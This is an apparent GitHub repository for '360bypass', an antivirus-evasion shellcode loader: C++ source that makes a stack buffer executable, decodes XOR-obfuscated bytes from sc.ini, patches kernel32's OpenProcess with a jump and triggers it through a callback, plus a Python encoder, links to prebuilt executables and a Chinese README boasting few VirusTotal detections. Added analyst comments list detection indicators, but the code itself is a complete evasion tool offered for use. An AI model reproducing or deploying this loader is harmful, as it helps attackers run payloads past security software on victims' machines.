├── PassAv.cpp ├── PassAv_x64.exe ├── PassAv_x86.exe ├── README.md ├── encode.py ├── finish.png └── finish2.png /PassAv.cpp: --------------------------------------------------------------------------------
// Analyst summary (derived from the code below): an in-process shellcode loader.
//   1. main() asks for PAGE_EXECUTE_READWRITE on a 3000-byte stack buffer.
//   2. It reads integer values keyed "0", "1", ... from section [key] of sc.ini
//      in the current working directory and stores the low byte of
//      (value ^ 1024) into that buffer.
//   3. InLine's constructor overwrites the first 5 bytes of kernel32's
//      OpenProcess, in the current process, with a JMP rel32 to the buffer.
//   4. The patched OpenProcess address is handed to EnumSystemLanguageGroupsA
//      as its enumeration callback, so the callback invocation lands on the jump.
// Behaviour a defender can key on: an RWX protection change covering thread
// stack memory, a WriteProcessMemory call on the current process whose target
// lies inside kernel32's code, and an export prologue in memory that no longer
// matches the on-disk image.

// Links as a GUI-subsystem image while keeping the CRT entry that calls main();
// presumably so that no console window is shown -- TODO confirm intent.
1 | #pragma comment(linker, "/subsystem:windows /entry:mainCRTStartup" )
2 | #define _CRT_SECURE_NO_DEPRECATE
// The header names of both includes were lost when the page was extracted.
3 | #include
4 | #include
5 |
6 | using namespace std;
7 |
// Function-pointer type shaped like the WriteProcessMemory call made below.
8 | typedef BOOL(WINAPI* Write)(
9 |     HANDLE hprocess,
10 |     LPVOID BaseAddr,
11 |     LPCVOID BUffer,
12 |     SIZE_T Size,
13 |     SIZE_T* NumberOfBytes
14 | );
// Resolved by name during global initialisation (before main runs) instead of
// being called directly; the result is never checked for NULL. The API name
// stays a plain string literal, so it is visible to static string inspection.
15 | Write Writer = (Write)GetProcAddress(
16 |     GetModuleHandleA("Kernel32.dll"),
17 |     "WriteProcessMemory"
18 | );
19 |
// Function-pointer type used for the VirtualProtect call in main().
20 | typedef BOOL(WINAPI* vp)(
21 |     LPVOID Address,
22 |     DWORD size,
23 |     DWORD New,
24 |     PDWORD Old
25 | );
// Same run-time lookup pattern as Writer; also not checked for NULL.
26 | vp vip = (vp)GetProcAddress(
27 |     GetModuleHandleA("Kernel32.dll"),
28 |     "VirtualProtect"
29 | );
30 |
// Holds the 5-byte patch and the two addresses the constructor works with.
// All of the behaviour is in the constructor; the class has no other members.
31 | class InLine {
32 |
33 | private:
     // Starts as {'0', 0, 0, 0, 0}; every byte is overwritten in the constructor.
34 |     BYTE Newbyte[5] = "0";
     // Jump destination supplied by the caller.
35 |     PROC FuncAddr;
     // Address of the function whose first bytes get overwritten.
36 |     PROC hookFunc;
37 | public:
38 |     InLine(PROC Func);
39 | };
40 |
// Patches kernel32!OpenProcess in the current process so that it begins with a
// jump to Func, then causes the patched address to be called as a callback.
// Func: destination of the jump; the process exits with code 1 if it is NULL or
// if OpenProcess cannot be resolved.
41 | InLine::InLine(PROC Func) {
42 |     FuncAddr = Func;
43 |     if (FuncAddr == NULL) {
44 |         exit(1);
45 |     }
46 |     hookFunc = GetProcAddress(
47 |         GetModuleHandleA("Kernel32.dll"),
48 |         "OpenProcess"
49 |     );
50 |     if (hookFunc == NULL) {
51 |         exit(1);
52 |     }
     // Receives the byte count from the write below; never read afterwards.
53 |     SIZE_T d;
     // 0xE9 is the x86 JMP rel32 opcode; the 4 bytes after it hold the
     // displacement, destination - source - 5 (5 = length of the instruction).
     // Both addresses are cast to DWORD before the subtraction.
54 |     Newbyte[0] = '\xE9';
55 |     *(DWORD*)(Newbyte + 1) = (DWORD)FuncAddr - (DWORD)hookFunc - 5;
56 |
     // Overwrites the first 5 bytes of OpenProcess in this process. The BOOL
     // result is ignored, so a failed write is not noticed.
57 |     Writer(GetCurrentProcess(), hookFunc, Newbyte, 5, &d);
58 |
     // The patched function is passed as the enumeration callback; no direct
     // call into the buffer appears anywhere in this file.
59 |     EnumSystemLanguageGroupsA((LANGUAGEGROUP_ENUMPROCA)hookFunc, LGRPID_INSTALLED, NULL);
60 | }
61 |
62 |
// Entry point: fills a stack buffer from sc.ini and hands it to InLine.
// Always returns 0; none of the API results except the per-key read are checked.
63 | int main() {
64 |     cout << 123;
65 |     char path[MAX_PATH];
     // Scratch buffer for the decimal key name of each entry.
66 |     char abc[3000];
     // Destination for the decoded bytes; a local array, so it lives on the stack.
67 |     unsigned char cba[3000];
68 |     DWORD d;
     // Requests read/write/execute on the memory holding cba; the previous
     // protection goes to d and is never restored.
69 |     vip(cba, sizeof(cba), PAGE_EXECUTE_READWRITE, &d);
70 |
     // The data file is located relative to the current working directory,
     // not relative to the executable's own location.
71 |     GetCurrentDirectoryA(MAX_PATH, path);
72 |
73 |     strcat(path, "\\sc.ini");
74 |
     // Reads keys "0".."2999" of section [key]. The default passed is NULL (0),
     // so a missing key or a stored 0 ends the loop. Only the low byte of
     // (value ^ 1024) survives the store into the unsigned char array.
75 |     for (int i = 0; i < 3000; i++) {
76 |         _itoa_s(i, abc, 10);
77 |         UINT ok = GetPrivateProfileIntA("key", abc, NULL, path);
78 |         if (ok == 0) {
79 |             break;
80 |         }
81 |         cba[i] = ok^1024;
82 |     }
     // Constructing the object performs the patch and triggers the callback.
83 |     InLine I((PROC)&cba);
84 |     return 0;
85 | }
-------------------------------------------------------------------------------- /PassAv_x64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/PassAv_x64.exe -------------------------------------------------------------------------------- /PassAv_x86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/PassAv_x86.exe -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 360bypass 2 | 利用inline hook免杀绕过360,vt爆3个 3 | 4 | 使用说明 5 | 本工具文章地址https://forum.butian.net/share/1824 (审核通过后即可看到) 6 | 7 | 1.把shellcode放到encode.py这个文件里(有注释的那个变量) 8 | 2.随后把cpp编译成exe 9 | 3.把生成的ini文件和exe文件放在同一个目录运行既可 10 | 11 | 4.在命令行使用的时候,需要cd到exe和sc.ini文件所在的目录,不然无法上线!!!
12 | 13 | 14 | 5.本项目中的PassAv_x86.exe和PassAv_x64.exe是因为有些师傅编译失败,我把编译好的发出来 15 | 16 | 免杀效果如下图 17 | ![a](https://github.com/wz-wsl/360bypass/blob/main/finish.png) 18 | ![b](https://github.com/wz-wsl/360bypass/blob/main/finish2.png) 19 | -------------------------------------------------------------------------------- /encode.py: --------------------------------------------------------------------------------
# Analyst summary: companion encoder that writes the sc.ini read by PassAv.cpp.
# Each payload byte b (0-255) is stored as the decimal string of b ^ 1024, i.e.
# a value in 1024-1279, under sequential keys 0, 1, 2, ... in section [key].
# A file of that shape next to the loader is a usable triage indicator.

# ASCII-art banner; it has no effect on the output file.
1 | print(" _")
2 | print("| |__ _ _ _ __ __ _ ___ ___")
3 | print("| '_ \| | | | '_ \ / _` / __/ __|")
4 | print("| |_) | |_| | |_) | (_| \__ \__ \\")
5 | print("|_.__/ \__, | .__/ \__,_|___/___/")
6 | print(" |___/|_|")
7 |
# Payload placeholder; it is an empty bytes literal in the repository.
8 | shellcode_=b""#put shellcode here
9 | shellcode=[]
# Iterating over bytes yields ints; each one is XORed with 1024 and kept as text.
10 | for i in shellcode_:
11 |     shellcode.append(str(i^1024))
# Join-then-split round trip: a non-empty list comes back unchanged, while the
# empty placeholder becomes [""], so the loop below then writes a single "0=".
12 | shellcode=",".join(shellcode).split(",")
# Written to the current working directory; the handle is closed explicitly at
# the end rather than through a with-block.
13 | file=open("sc.ini","w")
14 | file.write("[key]\n")
15 | n=0
# One "index=value" line per byte, with indexes counting up from 0.
16 | for i in shellcode:
17 |     file.write(f"{n}={i}\n")
18 |     n+=1
19 | file.close()
20 |
21 |
-------------------------------------------------------------------------------- /finish.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/finish.png -------------------------------------------------------------------------------- /finish2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wz-wsl/360bypass/e927de6edb7f491b4a9efcd31a4466dce422c5f1/finish2.png --------------------------------------------------------------------------------